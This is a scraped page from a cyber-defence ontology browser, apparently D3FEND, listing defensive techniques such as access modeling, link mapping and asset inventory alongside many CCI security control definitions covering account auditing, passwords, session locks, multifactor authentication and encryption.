Ontologies Classes Object Properties Data Properties Annotation Properties Individuals Datatypes Clouds

Individual: 'Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc'

Types (1)

definition

  • "Access modeling identifies and records the access permissions granted to administrators, users, groups, and systems."

rdfs:label

  • "Access Modeling"

d3fend-id

  • "D3-AM"

kb-reference

maps

Usage (5)

definition

  • "Active logical link mapping sends and receives network traffic as a means to map the whole data link layer, where the links represent logical data flows rather than physical connection"

kb-article

  • "## How it works

    Active logical link mapping establishes awareness of logical links in the network by sending data over the network to gather information about logical connections in the network.

    Typically this will be achieved through network telemetry coordinated for network management and monitoring and will use a link layer discovery protocol such as LLDP and the information gathered and aggregated a higher levels using an application protocol such as SNMP. The information may be polled by network management softare or configured once and then pushed from network sensors (or agents.)

    Another means of establishing network connectivity is by means of sendingn traffic through the use of a tool such as traceroute, to determine the logical paths through the network architecture.

    ## Considerations

    * Best practice is to encrypte network monitoring data and require authentication for queries or admin/management functions.
    * Push notifications reduce bandwidth necessary to capture and maintain information if reliable transport is used.
    * Special consideration should be made before using of active scanning in OT networks and OT-safe options chosen where available."

rdfs:label

  • "Active Logical Link Mapping"

d3fend-id

  • "D3-ALLM"

kb-reference

may-query

Usage (5)

definition

  • "Active physical link mapping sends and receives network traffic as a means to map the physical layer."

rdfs:label

  • "Active Physical Link Mapping"

synonym

  • "Active Physical Layer Mapping"

d3fend-id

  • "D3-APLM"

kb-reference

may-query

Usage (5)

definition

  • "Asset inventorying identifies and records the organization's assets and enriches each inventory item with knowledge about their vulnerabilities."

rdfs:label

  • "Asset Inventory"

synonym

  • "Asset Discovery"
  • "Asset Inventorying"

d3fend-id

  • "D3-AI"

display-order

  • 1

enables

Usage (5)

definition

  • "Asset vulnerability enumeration enriches inventory items with knowledge identifying their vulnerabilities."

rdfs:label

  • "Asset Vulnerability Enumeration"

d3fend-id

  • "D3-AVE"

evaluates

identifies

kb-reference

Usage (5)

definition

  • "The organization employs automated mechanisms to support the information system account management functions."

rdfs:label

  • "CCI-000015"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically removes or disables temporary accounts after an organization-defined time period for each type of account."

rdfs:label

  • "CCI-000016"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically disables inactive accounts after an organization-defined time period."

rdfs:label

  • "CCI-000017"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically audits account creation actions."

rdfs:label

  • "CCI-000018"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system dynamically manages user privileges and associated access authorizations."

rdfs:label

  • "CCI-000020"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces one or more organization-defined nondiscretionary access control policies over an organization-defined set of users and resources."

rdfs:label

  • "CCI-000022"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces information flow control using explicit security attributes on information, source, and destination objects as a basis for flow control decisions."

rdfs:label

  • "CCI-000025"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces dynamic information flow control based on organization-defined policies."

rdfs:label

  • "CCI-000027"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined limitations on the embedding of data types within other data types."

rdfs:label

  • "CCI-000029"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces information flow control based on organization-defined metadata."

rdfs:label

  • "CCI-000030"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces information flow control using organization-defined security policy filters as a basis for flow control decisions for organization-defined information flows."

rdfs:label

  • "CCI-000032"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for a privileged administrator to enable/disable organization-defined security policy filters under organization-defined conditions."

rdfs:label

  • "CCI-000034"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides the capability for privileged administrators to configure the organization-defined security policy filters to support different security policies."

rdfs:label

  • "CCI-000035"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements separation of duties through assigned information system access authorizations."

rdfs:label

  • "CCI-000037"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization audits any use of privileged accounts, or roles, with access to organization-defined security functions or security-relevant information, when accessing other system functions."

rdfs:label

  • "CCI-000040"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces the organization-defined limit of consecutive invalid logon attempts by a user during the organization-defined time period."

rdfs:label

  • "CCI-000044"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system delays next login prompt according to the organization-defined delay algorithm, when the maximum number of unsuccessful attempts is exceeded, automatically locks the account/node for an organization-defined time period or locks the account/node until released by an Administrator IAW organizational policy."

rdfs:label

  • "CCI-000047"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system retains the session lock until the user reestablishes access using established identification and authentication procedures."

rdfs:label

  • "CCI-000056"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system initiates a session lock after the organization-defined time period of inactivity."

rdfs:label

  • "CCI-000057"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for users to directly initiate session lock mechanisms."

rdfs:label

  • "CCI-000058"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system conceals, via the session lock, information previously visible on the display with a publicly viewable image."

rdfs:label

  • "CCI-000060"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization enforces requirements for remote connections to the information system."

rdfs:label

  • "CCI-000066"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system monitors remote access methods."

rdfs:label

  • "CCI-000067"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the confidentiality of remote access sessions."

rdfs:label

  • "CCI-000068"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization monitors for unauthorized remote connections to the information system on an organization-defined frequency."

rdfs:label

  • "CCI-000071"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system alerts designated organization-defined personnel or roles in the event of an audit processing failure."

rdfs:label

  • "CCI-000139"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a warning when allocated audit record storage volume reaches an organization-defined percentage of maximum audit record storage capacity."

rdfs:label

  • "CCI-000143"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a real-time alert when organization-defined audit failure events occur."

rdfs:label

  • "CCI-000144"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized access."

rdfs:label

  • "CCI-000162"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized modification."

rdfs:label

  • "CCI-000163"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized deletion."

rdfs:label

  • "CCI-000164"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, validates certifications by constructing and verifying a certification path to an accepted trust anchor including checking certificate status information."

rdfs:label

  • "CCI-000185"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, enforces authorized access to the corresponding private key."

rdfs:label

  • "CCI-000186"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, maps the authenticated identity to the account of the individual or group."

rdfs:label

  • "CCI-000187"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of upper case characters used."

rdfs:label

  • "CCI-000192"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of lower case characters used."

rdfs:label

  • "CCI-000193"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of numeric characters used."

rdfs:label

  • "CCI-000194"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, when new passwords are created, enforces that at least an organization-defined number of characters are changed."

rdfs:label

  • "CCI-000195"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, stores only cryptographically-protected passwords."

rdfs:label

  • "CCI-000196"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, transmits only cryptographically-protected passwords."

rdfs:label

  • "CCI-000197"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces minimum password lifetime restrictions."

rdfs:label

  • "CCI-000198"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces maximum password lifetime restrictions."

rdfs:label

  • "CCI-000199"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits password reuse for the organization-defined number of generations."

rdfs:label

  • "CCI-000200"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces minimum password length."

rdfs:label

  • "CCI-000205"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces approved authorizations for logical access to information and system resources in accordance with applicable access control policies."

rdfs:label

  • "CCI-000213"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, when transferring information between different security domains, identifies information flows by data type specification and usage."

rdfs:label

  • "CCI-000218"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, decomposes information into organization-defined policy-relevant subcomponents for submission to policy enforcement mechanisms."

rdfs:label

  • "CCI-000219"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for a privileged administrator to configure organization-defined security policy filters to support different security policies."

rdfs:label

  • "CCI-000226"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs automated mechanisms to enforce access restrictions."

rdfs:label

  • "CCI-000346"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the installation of organization-defined critical software programs that are not signed with a certificate that is recognized and approved by the organization."

rdfs:label

  • "CCI-000352"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms to respond to unauthorized changes to organization-defined configuration settings."

rdfs:label

  • "CCI-000374"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization configures the information system to provide only essential capabilities."

rdfs:label

  • "CCI-000381"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization configures the information system to prohibit or restrict the use of organization-defined functions, ports, protocols, and/or services."

rdfs:label

  • "CCI-000382"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs automated mechanisms to prevent program execution on the information system in accordance with the organization-defined specifications."

rdfs:label

  • "CCI-000386"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The organization disables network access by unauthorized components/devices or notifies designated organizational officials."

rdfs:label

  • "CCI-000417"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization (or information system) enforces explicit rules governing the installation of software by users."

rdfs:label

  • "CCI-000663"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users)."

rdfs:label

  • "CCI-000764"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to privileged accounts."

rdfs:label

  • "CCI-000765"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to non-privileged accounts."

rdfs:label

  • "CCI-000766"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for local access to privileged accounts."

rdfs:label

  • "CCI-000767"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for local access to non-privileged accounts."

rdfs:label

  • "CCI-000768"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses multifactor authentication for network access to privileged accounts where one of the factors is provided by a device separate from the information system being accessed."

rdfs:label

  • "CCI-000771"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses multifactor authentication for network access to non-privileged accounts where one of the factors is provided by a device separate from the information system being accessed."

rdfs:label

  • "CCI-000772"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses organization-defined replay-resistant authentication mechanisms for network access to privileged accounts."

rdfs:label

  • "CCI-000774"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses organization-defined replay-resistant authentication mechanisms for network access to non-privileged accounts."

rdfs:label

  • "CCI-000776"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users)."

rdfs:label

  • "CCI-000804"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements a configurable capability to automatically disable the information system if organization-defined security violations are detected."

rdfs:label

  • "CCI-000831"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs strong authenticators in the establishment of nonlocal maintenance and diagnostic sessions."

rdfs:label

  • "CCI-000877"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization audits non-local maintenance and diagnostic sessions."

rdfs:label

  • "CCI-000880"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects nonlocal maintenance sessions by employing organization-defined authenticators that are replay resistant."

rdfs:label

  • "CCI-000884"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to protect the integrity and confidentiality of non-local maintenance and diagnostic communications."

rdfs:label

  • "CCI-000888"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses cryptographic mechanisms to protect and restrict access to information on portable digital media."

rdfs:label

  • "CCI-001009"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to protect information in storage."

rdfs:label

  • "CCI-001019"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements privileged access authorization to organization-identified information system components for selected organization-defined vulnerability scanning activities."

rdfs:label

  • "CCI-001067"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms to detect the presence of unauthorized software on organizational information systems and notify designated organizational officials in accordance with the organization-defined frequency."

rdfs:label

  • "CCI-001069"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system separates user functionality (including user interface services) from information system management functionality."

rdfs:label

  • "CCI-001082"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the presentation of information system management-related functionality at an interface for non-privileged users."

rdfs:label

  • "CCI-001083"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system isolates security functions from nonsecurity functions."

rdfs:label

  • "CCI-001084"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system utilizes underlying hardware separation mechanisms to implement security function isolation."

rdfs:label

  • "CCI-001085"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions."

rdfs:label

  • "CCI-001086"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization implements an information system isolation boundary to minimize the number of nonsecurity functions included within the boundary containing security functions."

rdfs:label

  • "CCI-001087"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization implements security functions as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers."

rdfs:label

  • "CCI-001089"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents unauthorized and unintended information transfer via shared system resources."

rdfs:label

  • "CCI-001090"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects against or limits the effects of the organization-defined or referenced types of denial of service attacks."

rdfs:label

  • "CCI-001092"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system restricts the ability of individuals to launch organization-defined denial of service attacks against other information systems."

rdfs:label

  • "CCI-001094"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system limits the use of resources by priority."

rdfs:label

  • "CCI-001096"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents public access into the organization's internal networks except as appropriately mediated by managed interfaces employing boundary protection devices."

rdfs:label

  • "CCI-001100"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system at managed interfaces denies network communications traffic by default and allows network communications traffic by exception (i.e., deny all, permit by exception)."

rdfs:label

  • "CCI-001109"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system prevents remote devices that have established a non-remote connection with the system from communicating outside of that communications path with resources in external networks."

rdfs:label

  • "CCI-001111"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at managed interfaces, denies network traffic and audits internal users (or malicious code) posing a threat to external information systems."

rdfs:label

  • "CCI-001115"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system checks incoming communications to ensure the communications are coming from an authorized source and routed to an authorized destination."

rdfs:label

  • "CCI-001117"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements host-based boundary protection mechanisms for servers, workstations, and mobile devices."

rdfs:label

  • "CCI-001118"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents discovery of specific system components composing a managed interface."

rdfs:label

  • "CCI-001124"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces adherence to protocol format."

rdfs:label

  • "CCI-001125"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the integrity of transmitted information."

rdfs:label

  • "CCI-001127"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures."

rdfs:label

  • "CCI-001128"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system terminates the network connection associated with a communications session at the end of the session or after an organization-defined time period of inactivity."

rdfs:label

  • "CCI-001133"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements required cryptographic protections using cryptographic modules that comply with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance."

rdfs:label

  • "CCI-001144"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs, at a minimum, FIPS-validated cryptography to protect unclassified information."

rdfs:label

  • "CCI-001145"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs NSA-approved cryptography to protect classified information."

rdfs:label

  • "CCI-001146"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs, at a minimum, FIPS-validated cryptography to protect information when such information must be separated from individuals who have the necessary clearances yet lack the necessary access approvals."

rdfs:label

  • "CCI-001147"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits remote activation of collaborative computing devices, excluding the organization-defined exceptions where remote activation is to be allowed."

rdfs:label

  • "CCI-001150"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system identifies organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001166"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the download of organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001169"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the automatic execution of mobile code in organization-defined software applications."

rdfs:label

  • "CCI-001170"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides additional data origin authentication artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries."

rdfs:label

  • "CCI-001178"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system invalidates session identifiers upon user logout or other session termination."

rdfs:label

  • "CCI-001185"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the confidentiality and/or integrity of organization-defined information at rest."

rdfs:label

  • "CCI-001199"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information at rest unless otherwise protected by alternative physical measures."

rdfs:label

  • "CCI-001200"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at organization-defined information system components, loads and executes the operating environment from hardware-enforced, read-only media."

rdfs:label

  • "CCI-001210"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at organization-defined information system components, loads and executes organization-defined applications from hardware-enforced, read-only media."

rdfs:label

  • "CCI-001211"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms on an organization-defined frequency to determine the state of information system components with regard to flaw remediation."

rdfs:label

  • "CCI-001233"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated patch management tools to facilitate flaw remediation to organization-defined information system components."

rdfs:label

  • "CCI-001237"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs malicious code protection mechanisms at information system entry and exit points to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities."

rdfs:label

  • "CCI-001239"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization configures malicious code protection mechanisms to perform real-time scans of files from external sources at endpoints as the files are downloaded, opened, or executed in accordance with organizational security policy."

rdfs:label

  • "CCI-001242"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system monitors inbound and outbound communications for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-001262"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system detects unauthorized changes to software and information."

rdfs:label

  • "CCI-001297"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs spam protection mechanisms at information system entry and exit points to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means."

rdfs:label

  • "CCI-001305"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system checks the validity of organization-defined inputs."

rdfs:label

  • "CCI-001310"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of audit information."

rdfs:label

  • "CCI-001350"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects the audit records of non-local accesses to privileged accounts and the execution of privileged functions."

rdfs:label

  • "CCI-001352"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization monitors for atypical usage of information system accounts."

rdfs:label

  • "CCI-001356"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system enforces approved authorizations for controlling the flow of information within the system based on organization-defined information flow control policies."

rdfs:label

  • "CCI-001368"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, implements organization-defined security policy filters requiring fully enumerated formats that restrict data structure and content."

rdfs:label

  • "CCI-001372"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, examines the information for the presence of organization-defined unsanctioned information."

rdfs:label

  • "CCI-001373"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, prohibits the transfer of organization-defined unsanctioned information in accordance with the organization-defined security policy."

rdfs:label

  • "CCI-001374"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies source domains for information transfer."

rdfs:label

  • "CCI-001376"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely authenticates source domains for information transfer."

rdfs:label

  • "CCI-001377"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in storage."

rdfs:label

  • "CCI-001399"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in process."

rdfs:label

  • "CCI-001400"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in transmission."

rdfs:label

  • "CCI-001401"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically audits account modification actions."

rdfs:label

  • "CCI-001403"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system automatically audits account disabling actions."

rdfs:label

  • "CCI-001404"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system automatically audits account removal actions."

rdfs:label

  • "CCI-001405"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system enforces approved authorizations for controlling the flow of information between interconnected systems based on organization-defined information flow control policies."

rdfs:label

  • "CCI-001414"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system dynamically associates security attributes with organization-defined subjects in accordance with organization-defined security policies as information is created and combined."

rdfs:label

  • "CCI-001424"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to change the value of associated security attributes."

rdfs:label

  • "CCI-001425"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the binding of security attributes to information with sufficient assurance that the information--attribute association can be used as the basis for automated policy actions."

rdfs:label

  • "CCI-001426"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system allows authorized users to associate security attributes with information."

rdfs:label

  • "CCI-001427"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system displays security attributes in human-readable form on each object that the system transmits to output devices to identify organization-identified special dissemination, handling, or distribution instructions using organization-identified human-readable, standard naming conventions."

rdfs:label

  • "CCI-001428"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization disables organization-defined networking protocols within the information system deemed to be nonsecure except for explicitly identified components in support of specific operational requirements."

rdfs:label

  • "CCI-001436"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the organization-defined time period during which the limit of consecutive invalid access attempts by a user is counted."

rdfs:label

  • "CCI-001452"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of remote access sessions."

rdfs:label

  • "CCI-001453"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The organization ensures that remote sessions for accessing an organization-defined list of security functions and security-relevant information are audited."

rdfs:label

  • "CCI-001454"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized access."

rdfs:label

  • "CCI-001493"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized modification."

rdfs:label

  • "CCI-001494"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized deletion."

rdfs:label

  • "CCI-001495"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of audit tools."

rdfs:label

  • "CCI-001496"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization limits privileges to change software resident within software libraries."

rdfs:label

  • "CCI-001499"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies destination domains for information transfer."

rdfs:label

  • "CCI-001555"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely authenticates destination domains for information transfer."

rdfs:label

  • "CCI-001556"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system tracks problems associated with the information transfer."

rdfs:label

  • "CCI-001557"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system rejects or delays, as defined by the organization, network traffic which exceed the organization-defined thresholds."

rdfs:label

  • "CCI-001574"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization incorporates detection of unauthorized, security-relevant configuration changes into the organization‚Äôs incident response capability to ensure they are tracked."

rdfs:label

  • "CCI-001589"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of special characters used."

rdfs:label

  • "CCI-001619"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects nonlocal maintenance sessions by separating the maintenance session from other network sessions with the information system by either physically separated communications paths or logically separated communications paths based upon encryption."

rdfs:label

  • "CCI-001632"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system takes organization-defined corrective action when organization-defined unacceptable mobile code is identified."

rdfs:label

  • "CCI-001662"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs malicious code protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities."

rdfs:label

  • "CCI-001668"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs spam protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means."

rdfs:label

  • "CCI-001677"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically removes or disables emergency accounts after an organization-defined time period for each type of account."

rdfs:label

  • "CCI-001682"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account creation actions."

rdfs:label

  • "CCI-001683"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account modification actions."

rdfs:label

  • "CCI-001684"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account disabling actions."

rdfs:label

  • "CCI-001685"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account removal actions."

rdfs:label

  • "CCI-001686"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the execution of organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001695"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined security responses automatically if baseline configurations are changed in an unauthorized manner."

rdfs:label

  • "CCI-001744"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the installation of organization-defined software components without verification the software component has been digitally signed using a certificate that is recognized and approved by the organization."

rdfs:label

  • "CCI-001749"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization disables organization-defined functions, ports, protocols, and services within the information system deemed to be unnecessary and/or nonsecure."

rdfs:label

  • "CCI-001762"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents program execution in accordance with organization-defined policies regarding software program usage and restrictions, and/or rules authorizing the terms and conditions of software program usage."

rdfs:label

  • "CCI-001764"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs an allow-all, deny-by-exception policy to prohibit the execution of unauthorized software programs on the information system."

rdfs:label

  • "CCI-001767"

'date published'

contributor

member-of

narrower

Usage (5)

definition

